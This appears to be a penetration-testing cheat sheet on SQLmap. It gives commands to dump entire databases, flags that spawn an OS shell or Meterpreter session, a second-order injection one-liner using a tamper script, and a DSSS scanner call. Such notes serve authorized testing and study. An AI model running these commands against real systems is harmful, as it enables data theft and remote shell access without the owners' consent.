2.2 KiB
2.2 KiB
SQLmap
Usage
- Use
-rwith a saved HTTP request
sqlmap -r request.txt --dbms=mysql --dump
sqlmap -r request.txt --batch
- Select form data automatically
sqlmap -u http://<target-IP>/site.php --forms --dump-all
| Parameter | Details |
|---|---|
| -r | Uses the intercepted request save as a file |
| --dbms | DBMS of target |
| --dump | Dump the entire database |
| --dump-all | Dump everything |
| -p | TESTPARAMETER |
| --os-shell | Prompt for an interactive operating system shell |
| --os-pwn | Prompt for an OOB shell, Meterpreter or VNC |
| --tables | Show tables |
| -T | Specify table |
Advanced Features
Second Order SQL Injection
In case of an SQL injection where the result will be visible through another resource, use a second order injection. It is even possible to use a script in beforehand to login in and get a cookie, for example. A tutorial can be found on Le Thanh Phuc's blog
An example oneliner including a tamper script and a first and second request captured in Burpsuite
sqlmap -r $(pwd)/login.request --tamper $(pwd)/second_order_tamper.py --second-req $(pwd)/second.req -p username --proxy http://127.0.0.1:8080 --technique=U --dbms mysql
The second_order_tamper.py can be found inside this repository. Users are created through this script by SQLmap to further login through login.request and read the output through second.req (delete the cookie from the header). The vulnerable POST parameter is username.
Dump the databases, tables afterwards
Other Tools
Damn Small SQLi Scanner (DSSS)
python dsss.py -u "http://example.com/index.php?id="